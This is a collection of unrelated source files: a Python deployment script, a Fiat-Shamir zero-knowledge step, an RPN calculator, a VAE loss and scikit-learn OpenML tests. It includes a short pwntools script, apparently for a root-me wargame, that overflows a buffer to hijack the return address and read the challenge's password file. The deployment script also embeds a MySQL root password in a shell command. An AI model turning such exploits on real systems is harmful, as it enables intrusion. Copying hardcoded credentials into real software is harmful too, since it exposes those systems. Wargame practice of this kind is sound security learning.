remote_path = '%s/%s'%(conf['path_sql'],sql_bak_name)
local_path = '%s/%s'%(conf['path_source'],sql_bak_name)
try:
sftp.get(remote_path,local_path)
        print 'OK! %s downloaded successfully!'%sql_bak_name
except:
print 'Error! %s could not download!'%sql_bak_name
ssh.close()
if os.path.exists(local_path):
new_md5 = get_file_md5(local_path)
else:
new_md5 = ''
        print 'Error! The md5 source file %s does not exist!'%local_path
if not old_md5 == new_md5:
cmd = 'mysql -uroot -pbroadeng %s < %s/%s' %(db_name,conf['path_source'],sql_bak_name)
try:
subf = Popen(cmd,stderr=PIPE,shell=True)
err = subf.stderr.read()
except:
            err = 'Error! The command of updating the mysql table %s could not be done!'%db_name
if err:
print err
restart_service('mysql')
restart_service('mcuWeb')
with open(md5_file,'w') as fp_w:
fp_w.write(new_md5)
def close_sudo():
'''close sudo users'''
cmd = ['cp','-f','/etc/sudoers.bak','/etc/sudoers']
try:
subf = Popen(cmd,stderr=PIPE)
err = subf.stderr.read()
except:
        err = 'Error! The command of modifying the sudoers could not be done!'
if err:
print err
def main():
#update the mcu from git and tar it to tar_file
git_update_tar(ssh_get_source(conf['remote_ip'],conf['port'],'broad',conf['broad']),conf['path_mcu'],'mcu')
time.sleep(1)
    #download the mcu tar_file
scp_source(ssh_down_load(conf['remote_ip'],conf['port'],'root',conf['root']),conf['path_mcu'],'mcu')
time.sleep(1)
#clean the source
clean_source(ssh_get_source(conf['remote_ip'],conf['port'],'broad',conf['broad']),conf['path_mcu'],'mcu')
time.sleep(1)
#tar zxvf mcu
tar_zxvf('mcu')
time.sleep(1)
#make mcu and replace the old mcu
mcu_make()
time.sleep(1)
#restart the mcu
restart_service('mediamixer')
#update the siremis from git and tar it to tar_file
git_update_tar(ssh_get_source(conf['remote_ip'], conf['port'], 'broad', conf['broad']), conf['path_siremis'], 'siremis-4.0.0')
time.sleep(1)
    #download the siremis tar_file
scp_source(ssh_down_load(conf['remote_ip'], conf['port'], 'root', conf['root']), conf['path_siremis'], 'siremis-4.0.0')
time.sleep(1)
#clean the source
clean_source(ssh_get_source(conf['remote_ip'],conf['port'],'broad',conf['broad']),conf['path_siremis'],'siremis-4.0.0')
time.sleep(1)
    #tar zxvf siremis
tar_zxvf('siremis-4.0.0')
time.sleep(1)
#remove the old siremis and copy the new siremis to /var/www
replace_siremis('siremis-4.0.0')
time.sleep(1)
#restart the apache2 to make sure it work
restart_service('apache2')
#update mysql table
update_sql('kamailio','kamailio.sql')
#purge the kernel
purge_kernel('linux-image-3.11.6-031106-generic')
purge_kernel('linux-image-3.9.5-030905-generic')
#close sudoers
close_sudo()
#remove the rubbish
remove_rubbish('/opt/*')
remove_rubbish('/usr/local/src/*')
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
79791e657d895150d196b1b657a4d3fecc3f369a | d50aee7c9ede6e17be1825b4ef124fdfd63b67bf | /wargames/root-me/basic2.py | fdbea4bda5383dd9a8a464468050939c8bf50d60 | [] | no_license | geethna/Binary-Exploitation | c4512f8389fc2ef94954ba13ca60b63afd430967 | ef22d7592cd536b08dcad503f744b31f73bb761b | refs/heads/master | 2022-11-23T04:33:59.076903 | 2020-07-29T06:35:27 | 2020-07-29T06:35:27 | 283,412,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 244 | py | from pwn import *
p = ssh(host='challenge02.root-me.org', user='app-systeme-ch15', password='app-systeme-ch15', port=2222)
s = p.process(executable='./ch15')
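# 128 filler bytes reach the saved return address on the stack, which is then
# overwritten with 0x08048464 in little-endian form -- presumably the address
# of the routine in ch15 that grants the shell used to read .passwd.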
s.sendline('i' * 128 + '\x64\x84\x04\x08')
s.sendline('cat .passwd')
print s.recvline()
| [
"[email protected]"
] | |
0d9dd9c943b6681df14ffab31032cc8d1c929a07 | a0e6a780eb8789b4674a686997a3d9de9ad9c95c | /contracts/business_template/privacy_computation/Fiat-Shamir-ZK/contract_step45.py | e1bd0b4f7e3fdaf1db8c14492ba9eb4962748dc8 | [
"Apache-2.0",
"Apache-1.1"
] | permissive | freezehe/SmartDev-Contract | 4e8d5d3670e59889500269a6207d1c855972cac7 | ec31fb787bdab96703669b551f938e3c327fc00e | refs/heads/master | 2023-06-29T09:12:14.049701 | 2021-08-04T13:39:18 | 2021-08-04T13:39:18 | 385,824,978 | 2 | 0 | Apache-2.0 | 2021-07-14T05:34:01 | 2021-07-14T05:34:01 | null | UTF-8 | Python | false | false | 337 | py | import libnum
import hashlib
import random
n=8269
g=11
password = "Hello"
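# Peggy's secret exponent x is derived from the password: the first 8 hex
# digits of its SHA-256 digest, interpreted as an integer and reduced mod n.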
x = int(hashlib.sha256(password.encode()).hexdigest()[:8], 16) % n
print('\n======Phase 4: Peggy receives c, calculates r=v-cx, and sends r to Victor==================')
c = input("c= ")
v = input("v= ")
r = (int(v) - int(c) * x) % (n-1)
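# Hedged sketch (not part of this step file): Victor's Phase 5 verification.
# Assuming y = g^x mod n is Peggy's public key and t = g^v mod n was the
# commitment sent in an earlier phase, Victor accepts iff
# g^r * y^c == t (mod n), because g^(v - c*x) * (g^x)^c = g^v.
# y = pow(g, x, n)                      # hypothetical public key
# t = pow(g, int(v), n)                 # hypothetical Phase-2 commitment
# assert (pow(g, r, n) * pow(y, int(c), n)) % n == t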
print('r=v-cx =\t\t',r) | [
"[email protected]"
] | |
7469228ba95707cd19ef91526eeb6fb67073a8e4 | 276ceede3fe56f00af940732df478f045337b67c | /Loss_functions.py | 4b8856c98b96e6d87b6c349432b09085e0ecbeb2 | [] | no_license | Ali-Sahili/Generative_Architectures | 32c4a122af567f4b48418e69b13210a76254932f | bd7ae32e149592221b622f2d3ab9a43c1daa89ca | refs/heads/master | 2022-08-10T12:55:58.726022 | 2022-07-09T15:06:05 | 2022-07-09T15:06:05 | 255,911,670 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | import torch
from torch import nn
# This function is used in the variational auto-encoder
reconstruction_function = nn.MSELoss(reduction='sum')  # sum over elements; replaces the deprecated size_average=False
def loss_function(recon_x, x, mu, logvar):
"""
recon_x: generating images
x: origin images
mu: latent mean
logvar: latent log variance
"""
BCE = reconstruction_function(recon_x, x) # mse loss
# loss = 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)
KLD_element = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar)
KLD = torch.sum(KLD_element).mul_(-0.5)
# KL divergence
return BCE + KLD
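# Hedged usage sketch (assumes a VAE whose forward pass returns recon_x, mu, logvar):
# recon_x, mu, logvar = model(x)
# loss = loss_function(recon_x, x, mu, logvar)
# loss.backward()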
| [
"[email protected]"
] | |
9c53e1a542d95c9a0bc8497a2a168df57c45e704 | 2a3a7f4940157f3d07700451b2633f60ba58abdc | /stack/150-Evaluate-Reverse-Polish-Notation/num_push_operator_pop2push1.py | 7e80fad345956003b2ab85e49202df48460ea324 | [] | no_license | moonlightshadow123/leetcode_solutions | cd8400eff270f0608995089ab0207240071a7c46 | 6e4fa7fba17292fe4e2511555d743f41259d5351 | refs/heads/master | 2021-05-24T03:43:49.949864 | 2020-04-11T03:55:27 | 2020-04-11T03:55:27 | 73,599,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 881 | py | import math
class Solution(object):
def evalRPN(self, tokens):
"""
:type tokens: List[str]
:rtype: int
"""
operators = set(['+', '-', '*', '/'])
stack = []
for token in tokens:
if token in operators:
                y = stack.pop()
                x = stack.pop()
                stack.append(self.operate(x, y, token))
else:
stack.append(int(token))
return stack[-1]
def operate(self, x, y, token):
if token == '+':
return x + y
elif token == '-':
return x - y
elif token == '*':
return x * y
elif token == '/':
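            # Python 2 floor-divides ints toward -inf, while this problem
            # expects truncation toward zero, hence the ceil for mixed signs.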
if x*y < 0:
return int(math.ceil(float(x) / y))
else:
return x / y
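# Hedged usage example (not part of the LeetCode submission):
# print Solution().evalRPN(["2", "1", "+", "3", "*"])  # (2 + 1) * 3 -> 9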
| [
"[email protected]"
] | |
1086b526a49d9b0593b4fd44ca8ffb61a9479f33 | 6e820756b82ffbe9837348937e53f1a0ce0e6cca | /Lib/site-packages/sklearn/datasets/tests/test_openml.py | fa6b53d5132cbf961f655908b2a6fbb64b0f596f | [] | no_license | AndreasPatsimas/pms_papei | c2afd941de6ae234dd37784d746e794183ebb8d3 | da10220ea468304c1066bed55b8f92ba9e5ada8a | refs/heads/master | 2023-02-01T23:33:39.221747 | 2020-12-19T12:17:59 | 2020-12-19T12:17:59 | 321,115,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46,761 | py | """Test the openml loader.
"""
import gzip
import json
import numpy as np
import os
import re
import scipy.sparse
import sklearn
import pytest
from sklearn import config_context
from sklearn.datasets import fetch_openml
from sklearn.datasets._openml import (_open_openml_url,
_arff,
_DATA_FILE,
_get_data_description_by_id,
_get_local_path,
_retry_with_clean_cache,
_feature_to_dtype)
from sklearn.utils._testing import (assert_warns_message,
assert_raise_message)
from sklearn.utils import is_scalar_nan
from sklearn.utils._testing import assert_allclose, assert_array_equal
from urllib.error import HTTPError
from sklearn.datasets.tests.test_common import check_return_X_y
from functools import partial
currdir = os.path.dirname(os.path.abspath(__file__))
# if True, urlopen will be monkey patched to only use local files
test_offline = True
def _test_features_list(data_id):
# XXX Test is intended to verify/ensure correct decoding behavior
# Not usable with sparse data or datasets that have columns marked as
# {row_identifier, ignore}
def decode_column(data_bunch, col_idx):
col_name = data_bunch.feature_names[col_idx]
if col_name in data_bunch.categories:
# XXX: This would be faster with np.take, although it does not
# handle missing values fast (also not with mode='wrap')
cat = data_bunch.categories[col_name]
result = [None if is_scalar_nan(idx) else cat[int(idx)]
for idx in data_bunch.data[:, col_idx]]
return np.array(result, dtype='O')
else:
# non-nominal attribute
return data_bunch.data[:, col_idx]
data_bunch = fetch_openml(data_id=data_id, cache=False, target_column=None)
# also obtain decoded arff
data_description = _get_data_description_by_id(data_id, None)
sparse = data_description['format'].lower() == 'sparse_arff'
if sparse is True:
raise ValueError('This test is not intended for sparse data, to keep '
'code relatively simple')
url = _DATA_FILE.format(data_description['file_id'])
with _open_openml_url(url, data_home=None) as f:
data_arff = _arff.load((line.decode('utf-8') for line in f),
return_type=(_arff.COO if sparse
else _arff.DENSE_GEN),
encode_nominal=False)
data_downloaded = np.array(list(data_arff['data']), dtype='O')
for i in range(len(data_bunch.feature_names)):
# XXX: Test per column, as this makes it easier to avoid problems with
# missing values
np.testing.assert_array_equal(data_downloaded[:, i],
decode_column(data_bunch, i))
def _fetch_dataset_from_openml(data_id, data_name, data_version,
target_column,
expected_observations, expected_features,
expected_missing,
expected_data_dtype, expected_target_dtype,
expect_sparse, compare_default_target):
# fetches a dataset in three various ways from OpenML, using the
# fetch_openml function, and does various checks on the validity of the
# result. Note that this function can be mocked (by invoking
# _monkey_patch_webbased_functions before invoking this function)
data_by_name_id = fetch_openml(name=data_name, version=data_version,
cache=False)
assert int(data_by_name_id.details['id']) == data_id
# Please note that cache=False is crucial, as the monkey patched files are
# not consistent with reality
fetch_openml(name=data_name, cache=False)
# without specifying the version, there is no guarantee that the data id
# will be the same
# fetch with dataset id
data_by_id = fetch_openml(data_id=data_id, cache=False,
target_column=target_column)
assert data_by_id.details['name'] == data_name
assert data_by_id.data.shape == (expected_observations, expected_features)
if isinstance(target_column, str):
# single target, so target is vector
assert data_by_id.target.shape == (expected_observations, )
assert data_by_id.target_names == [target_column]
elif isinstance(target_column, list):
# multi target, so target is array
assert data_by_id.target.shape == (expected_observations,
len(target_column))
assert data_by_id.target_names == target_column
assert data_by_id.data.dtype == expected_data_dtype
assert data_by_id.target.dtype == expected_target_dtype
assert len(data_by_id.feature_names) == expected_features
for feature in data_by_id.feature_names:
assert isinstance(feature, str)
# TODO: pass in a list of expected nominal features
for feature, categories in data_by_id.categories.items():
feature_idx = data_by_id.feature_names.index(feature)
values = np.unique(data_by_id.data[:, feature_idx])
values = values[np.isfinite(values)]
assert set(values) <= set(range(len(categories)))
if compare_default_target:
# check whether the data by id and data by id target are equal
data_by_id_default = fetch_openml(data_id=data_id, cache=False)
np.testing.assert_allclose(data_by_id.data, data_by_id_default.data)
if data_by_id.target.dtype == np.float64:
np.testing.assert_allclose(data_by_id.target,
data_by_id_default.target)
else:
assert np.array_equal(data_by_id.target, data_by_id_default.target)
if expect_sparse:
assert isinstance(data_by_id.data, scipy.sparse.csr_matrix)
else:
assert isinstance(data_by_id.data, np.ndarray)
# np.isnan doesn't work on CSR matrix
assert (np.count_nonzero(np.isnan(data_by_id.data)) ==
expected_missing)
# test return_X_y option
fetch_func = partial(fetch_openml, data_id=data_id, cache=False,
target_column=target_column)
check_return_X_y(data_by_id, fetch_func)
return data_by_id
def _monkey_patch_webbased_functions(context,
data_id,
gzip_response):
# monkey patches the urlopen function. Important note: Do NOT use this
# in combination with a regular cache directory, as the files that are
# stored as cache should not be mixed up with real openml datasets
url_prefix_data_description = "https://openml.org/api/v1/json/data/"
url_prefix_data_features = "https://openml.org/api/v1/json/data/features/"
url_prefix_download_data = "https://openml.org/data/v1/"
url_prefix_data_list = "https://openml.org/api/v1/json/data/list/"
path_suffix = '.gz'
read_fn = gzip.open
class MockHTTPResponse:
def __init__(self, data, is_gzip):
self.data = data
self.is_gzip = is_gzip
def read(self, amt=-1):
return self.data.read(amt)
def tell(self):
return self.data.tell()
def seek(self, pos, whence=0):
return self.data.seek(pos, whence)
def close(self):
self.data.close()
def info(self):
if self.is_gzip:
return {'Content-Encoding': 'gzip'}
return {}
def __iter__(self):
return iter(self.data)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return False
def _file_name(url, suffix):
return (re.sub(r'\W', '-', url[len("https://openml.org/"):])
+ suffix + path_suffix)
def _mock_urlopen_data_description(url, has_gzip_header):
assert url.startswith(url_prefix_data_description)
path = os.path.join(currdir, 'data', 'openml', str(data_id),
_file_name(url, '.json'))
if has_gzip_header and gzip_response:
fp = open(path, 'rb')
return MockHTTPResponse(fp, True)
else:
fp = read_fn(path, 'rb')
return MockHTTPResponse(fp, False)
def _mock_urlopen_data_features(url, has_gzip_header):
assert url.startswith(url_prefix_data_features)
path = os.path.join(currdir, 'data', 'openml', str(data_id),
_file_name(url, '.json'))
if has_gzip_header and gzip_response:
fp = open(path, 'rb')
return MockHTTPResponse(fp, True)
else:
fp = read_fn(path, 'rb')
return MockHTTPResponse(fp, False)
def _mock_urlopen_download_data(url, has_gzip_header):
assert (url.startswith(url_prefix_download_data))
path = os.path.join(currdir, 'data', 'openml', str(data_id),
_file_name(url, '.arff'))
if has_gzip_header and gzip_response:
fp = open(path, 'rb')
return MockHTTPResponse(fp, True)
else:
fp = read_fn(path, 'rb')
return MockHTTPResponse(fp, False)
def _mock_urlopen_data_list(url, has_gzip_header):
assert url.startswith(url_prefix_data_list)
json_file_path = os.path.join(currdir, 'data', 'openml',
str(data_id), _file_name(url, '.json'))
# load the file itself, to simulate a http error
json_data = json.loads(read_fn(json_file_path, 'rb').
read().decode('utf-8'))
if 'error' in json_data:
raise HTTPError(url=None, code=412,
msg='Simulated mock error',
hdrs=None, fp=None)
if has_gzip_header:
fp = open(json_file_path, 'rb')
return MockHTTPResponse(fp, True)
else:
fp = read_fn(json_file_path, 'rb')
return MockHTTPResponse(fp, False)
def _mock_urlopen(request):
url = request.get_full_url()
has_gzip_header = request.get_header('Accept-encoding') == "gzip"
if url.startswith(url_prefix_data_list):
return _mock_urlopen_data_list(url, has_gzip_header)
elif url.startswith(url_prefix_data_features):
return _mock_urlopen_data_features(url, has_gzip_header)
elif url.startswith(url_prefix_download_data):
return _mock_urlopen_download_data(url, has_gzip_header)
elif url.startswith(url_prefix_data_description):
return _mock_urlopen_data_description(url, has_gzip_header)
else:
raise ValueError('Unknown mocking URL pattern: %s' % url)
# XXX: Global variable
if test_offline:
context.setattr(sklearn.datasets._openml, 'urlopen', _mock_urlopen)
@pytest.mark.parametrize('feature, expected_dtype', [
({'data_type': 'string', 'number_of_missing_values': '0'}, object),
({'data_type': 'string', 'number_of_missing_values': '1'}, object),
({'data_type': 'numeric', 'number_of_missing_values': '0'}, np.float64),
({'data_type': 'numeric', 'number_of_missing_values': '1'}, np.float64),
({'data_type': 'real', 'number_of_missing_values': '0'}, np.float64),
({'data_type': 'real', 'number_of_missing_values': '1'}, np.float64),
({'data_type': 'integer', 'number_of_missing_values': '0'}, np.int64),
({'data_type': 'integer', 'number_of_missing_values': '1'}, np.float64),
({'data_type': 'nominal', 'number_of_missing_values': '0'}, 'category'),
({'data_type': 'nominal', 'number_of_missing_values': '1'}, 'category'),
])
def test_feature_to_dtype(feature, expected_dtype):
assert _feature_to_dtype(feature) == expected_dtype
@pytest.mark.parametrize('feature', [
{'data_type': 'datatime', 'number_of_missing_values': '0'}
])
def test_feature_to_dtype_error(feature):
msg = 'Unsupported feature: {}'.format(feature)
with pytest.raises(ValueError, match=msg):
_feature_to_dtype(feature)
def test_fetch_openml_iris_pandas(monkeypatch):
# classification dataset with numeric only columns
    pd = pytest.importorskip('pandas')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 61
data_shape = (150, 4)
target_shape = (150, )
frame_shape = (150, 5)
target_dtype = CategoricalDtype(['Iris-setosa', 'Iris-versicolor',
'Iris-virginica'])
data_dtypes = [np.float64] * 4
data_names = ['sepallength', 'sepalwidth', 'petallength', 'petalwidth']
target_name = 'class'
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert np.all(data.dtypes == data_dtypes)
assert data.shape == data_shape
assert np.all(data.columns == data_names)
assert np.all(bunch.feature_names == data_names)
assert bunch.target_names == [target_name]
assert isinstance(target, pd.Series)
assert target.dtype == target_dtype
assert target.shape == target_shape
assert target.name == target_name
assert target.index.is_unique
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
assert np.all(frame.dtypes == data_dtypes + [target_dtype])
assert frame.index.is_unique
def test_fetch_openml_iris_pandas_equal_to_no_frame(monkeypatch):
# as_frame = True returns the same underlying data as as_frame = False
    pytest.importorskip('pandas')
data_id = 61
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
frame_bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False)
frame_data = frame_bunch.data
frame_target = frame_bunch.target
norm_bunch = fetch_openml(data_id=data_id, as_frame=False, cache=False)
norm_data = norm_bunch.data
norm_target = norm_bunch.target
assert_allclose(norm_data, frame_data)
assert_array_equal(norm_target, frame_target)
def test_fetch_openml_iris_multitarget_pandas(monkeypatch):
# classification dataset with numeric only columns
    pd = pytest.importorskip('pandas')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 61
data_shape = (150, 3)
target_shape = (150, 2)
frame_shape = (150, 5)
target_column = ['petalwidth', 'petallength']
cat_dtype = CategoricalDtype(['Iris-setosa', 'Iris-versicolor',
'Iris-virginica'])
data_dtypes = [np.float64, np.float64] + [cat_dtype]
data_names = ['sepallength', 'sepalwidth', 'class']
target_dtypes = [np.float64, np.float64]
target_names = ['petalwidth', 'petallength']
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False,
target_column=target_column)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert np.all(data.dtypes == data_dtypes)
assert data.shape == data_shape
assert np.all(data.columns == data_names)
assert np.all(bunch.feature_names == data_names)
assert bunch.target_names == target_names
assert isinstance(target, pd.DataFrame)
assert np.all(target.dtypes == target_dtypes)
assert target.shape == target_shape
assert np.all(target.columns == target_names)
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
assert np.all(frame.dtypes == [np.float64] * 4 + [cat_dtype])
def test_fetch_openml_anneal_pandas(monkeypatch):
# classification dataset with numeric and categorical columns
    pd = pytest.importorskip('pandas')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 2
target_column = 'class'
data_shape = (11, 38)
target_shape = (11,)
frame_shape = (11, 39)
expected_data_categories = 32
expected_data_floats = 6
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True,
target_column=target_column, cache=False)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert data.shape == data_shape
n_categories = len([dtype for dtype in data.dtypes
if isinstance(dtype, CategoricalDtype)])
n_floats = len([dtype for dtype in data.dtypes if dtype.kind == 'f'])
assert expected_data_categories == n_categories
assert expected_data_floats == n_floats
assert isinstance(target, pd.Series)
assert target.shape == target_shape
assert isinstance(target.dtype, CategoricalDtype)
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
def test_fetch_openml_cpu_pandas(monkeypatch):
# regression dataset with numeric and categorical columns
    pd = pytest.importorskip('pandas')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 561
data_shape = (209, 7)
target_shape = (209, )
frame_shape = (209, 8)
cat_dtype = CategoricalDtype(['adviser', 'amdahl', 'apollo', 'basf',
'bti', 'burroughs', 'c.r.d', 'cdc',
'cambex', 'dec', 'dg', 'formation',
'four-phase', 'gould', 'hp', 'harris',
'honeywell', 'ibm', 'ipl', 'magnuson',
'microdata', 'nas', 'ncr', 'nixdorf',
'perkin-elmer', 'prime', 'siemens',
'sperry', 'sratus', 'wang'])
data_dtypes = [cat_dtype] + [np.float64] * 6
feature_names = ['vendor', 'MYCT', 'MMIN', 'MMAX', 'CACH',
'CHMIN', 'CHMAX']
target_name = 'class'
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert data.shape == data_shape
assert np.all(data.dtypes == data_dtypes)
assert np.all(data.columns == feature_names)
assert np.all(bunch.feature_names == feature_names)
assert bunch.target_names == [target_name]
assert isinstance(target, pd.Series)
assert target.shape == target_shape
assert target.dtype == np.float64
assert target.name == target_name
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
def test_fetch_openml_australian_pandas_error_sparse(monkeypatch):
data_id = 292
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
msg = 'Cannot return dataframe with sparse data'
with pytest.raises(ValueError, match=msg):
fetch_openml(data_id=data_id, as_frame=True, cache=False)
def test_convert_arff_data_dataframe_warning_low_memory_pandas(monkeypatch):
    pytest.importorskip('pandas')
data_id = 1119
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
msg = 'Could not adhere to working_memory config.'
with pytest.warns(UserWarning, match=msg):
with config_context(working_memory=1e-6):
fetch_openml(data_id=data_id, as_frame=True, cache=False)
def test_fetch_openml_adultcensus_pandas_return_X_y(monkeypatch):
    pd = pytest.importorskip('pandas')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 1119
data_shape = (10, 14)
target_shape = (10, )
expected_data_categories = 8
expected_data_floats = 6
target_column = 'class'
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
X, y = fetch_openml(data_id=data_id, as_frame=True, cache=False,
return_X_y=True)
assert isinstance(X, pd.DataFrame)
assert X.shape == data_shape
n_categories = len([dtype for dtype in X.dtypes
if isinstance(dtype, CategoricalDtype)])
n_floats = len([dtype for dtype in X.dtypes if dtype.kind == 'f'])
assert expected_data_categories == n_categories
assert expected_data_floats == n_floats
assert isinstance(y, pd.Series)
assert y.shape == target_shape
assert y.name == target_column
def test_fetch_openml_adultcensus_pandas(monkeypatch):
    pd = pytest.importorskip('pandas')
CategoricalDtype = pd.api.types.CategoricalDtype
# Check because of the numeric row attribute (issue #12329)
data_id = 1119
data_shape = (10, 14)
target_shape = (10, )
frame_shape = (10, 15)
expected_data_categories = 8
expected_data_floats = 6
target_column = 'class'
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert data.shape == data_shape
n_categories = len([dtype for dtype in data.dtypes
if isinstance(dtype, CategoricalDtype)])
n_floats = len([dtype for dtype in data.dtypes if dtype.kind == 'f'])
assert expected_data_categories == n_categories
assert expected_data_floats == n_floats
assert isinstance(target, pd.Series)
assert target.shape == target_shape
assert target.name == target_column
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
def test_fetch_openml_miceprotein_pandas(monkeypatch):
# JvR: very important check, as this dataset defined several row ids
# and ignore attributes. Note that data_features json has 82 attributes,
# and row id (1), ignore attributes (3) have been removed.
    pd = pytest.importorskip('pandas')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 40966
data_shape = (7, 77)
target_shape = (7, )
frame_shape = (7, 78)
target_column = 'class'
frame_n_categories = 1
frame_n_floats = 77
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert data.shape == data_shape
assert np.all(data.dtypes == np.float64)
assert isinstance(target, pd.Series)
assert isinstance(target.dtype, CategoricalDtype)
assert target.shape == target_shape
assert target.name == target_column
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
n_categories = len([dtype for dtype in frame.dtypes
if isinstance(dtype, CategoricalDtype)])
n_floats = len([dtype for dtype in frame.dtypes if dtype.kind == 'f'])
assert frame_n_categories == n_categories
assert frame_n_floats == n_floats
def test_fetch_openml_emotions_pandas(monkeypatch):
# classification dataset with multiple targets (natively)
    pd = pytest.importorskip('pandas')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 40589
target_column = ['amazed.suprised', 'happy.pleased', 'relaxing.calm',
'quiet.still', 'sad.lonely', 'angry.aggresive']
data_shape = (13, 72)
target_shape = (13, 6)
frame_shape = (13, 78)
expected_frame_categories = 6
expected_frame_floats = 72
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False,
target_column=target_column)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert data.shape == data_shape
assert isinstance(target, pd.DataFrame)
assert target.shape == target_shape
assert np.all(target.columns == target_column)
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
n_categories = len([dtype for dtype in frame.dtypes
if isinstance(dtype, CategoricalDtype)])
n_floats = len([dtype for dtype in frame.dtypes if dtype.kind == 'f'])
assert expected_frame_categories == n_categories
assert expected_frame_floats == n_floats
def test_fetch_openml_titanic_pandas(monkeypatch):
# dataset with strings
    pd = pytest.importorskip('pandas')
CategoricalDtype = pd.api.types.CategoricalDtype
data_id = 40945
data_shape = (1309, 13)
target_shape = (1309, )
frame_shape = (1309, 14)
name_to_dtype = {
'pclass': np.float64,
'name': object,
'sex': CategoricalDtype(['female', 'male']),
'age': np.float64,
'sibsp': np.float64,
'parch': np.float64,
'ticket': object,
'fare': np.float64,
'cabin': object,
'embarked': CategoricalDtype(['C', 'Q', 'S']),
'boat': object,
'body': np.float64,
'home.dest': object,
'survived': CategoricalDtype(['0', '1'])
}
frame_columns = ['pclass', 'survived', 'name', 'sex', 'age', 'sibsp',
'parch', 'ticket', 'fare', 'cabin', 'embarked',
'boat', 'body', 'home.dest']
frame_dtypes = [name_to_dtype[col] for col in frame_columns]
feature_names = ['pclass', 'name', 'sex', 'age', 'sibsp',
'parch', 'ticket', 'fare', 'cabin', 'embarked',
'boat', 'body', 'home.dest']
target_name = 'survived'
_monkey_patch_webbased_functions(monkeypatch, data_id, True)
bunch = fetch_openml(data_id=data_id, as_frame=True, cache=False)
data = bunch.data
target = bunch.target
frame = bunch.frame
assert isinstance(data, pd.DataFrame)
assert data.shape == data_shape
assert np.all(data.columns == feature_names)
assert bunch.target_names == [target_name]
assert isinstance(target, pd.Series)
assert target.shape == target_shape
assert target.name == target_name
assert target.dtype == name_to_dtype[target_name]
assert isinstance(frame, pd.DataFrame)
assert frame.shape == frame_shape
assert np.all(frame.dtypes == frame_dtypes)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_iris(monkeypatch, gzip_response):
# classification dataset with numeric only columns
data_id = 61
data_name = 'iris'
data_version = 1
target_column = 'class'
expected_observations = 150
expected_features = 4
expected_missing = 0
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
assert_warns_message(
UserWarning,
"Multiple active versions of the dataset matching the name"
" iris exist. Versions may be fundamentally different, "
"returning version 1.",
_fetch_dataset_from_openml,
**{'data_id': data_id, 'data_name': data_name,
'data_version': data_version,
'target_column': target_column,
'expected_observations': expected_observations,
'expected_features': expected_features,
'expected_missing': expected_missing,
'expect_sparse': False,
'expected_data_dtype': np.float64,
'expected_target_dtype': object,
'compare_default_target': True}
)
def test_decode_iris(monkeypatch):
data_id = 61
_monkey_patch_webbased_functions(monkeypatch, data_id, False)
_test_features_list(data_id)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_iris_multitarget(monkeypatch, gzip_response):
# classification dataset with numeric only columns
data_id = 61
data_name = 'iris'
data_version = 1
target_column = ['sepallength', 'sepalwidth']
expected_observations = 150
expected_features = 3
expected_missing = 0
_monkey_patch_webbased_functions(monkeypatch, data_id, gzip_response)
_fetch_dataset_from_openml(data_id, data_name, data_version, target_column,
expected_observations, expected_features,
expected_missing,
np.float64, np.float64, expect_sparse=False,
compare_default_target=False)
@pytest.mark.parametrize('gzip_response', [True, False])
def test_fetch_openml_anneal(monkeypatch, gzip_response):
# classification dataset with numeric and categorical columns
data_id = 2
data_name = 'anneal'
data_version = 1
target_column = 'class'
# Not all original instances included for space reasons
expected_observations = 11
expected_features = 38
expected_missing = 267
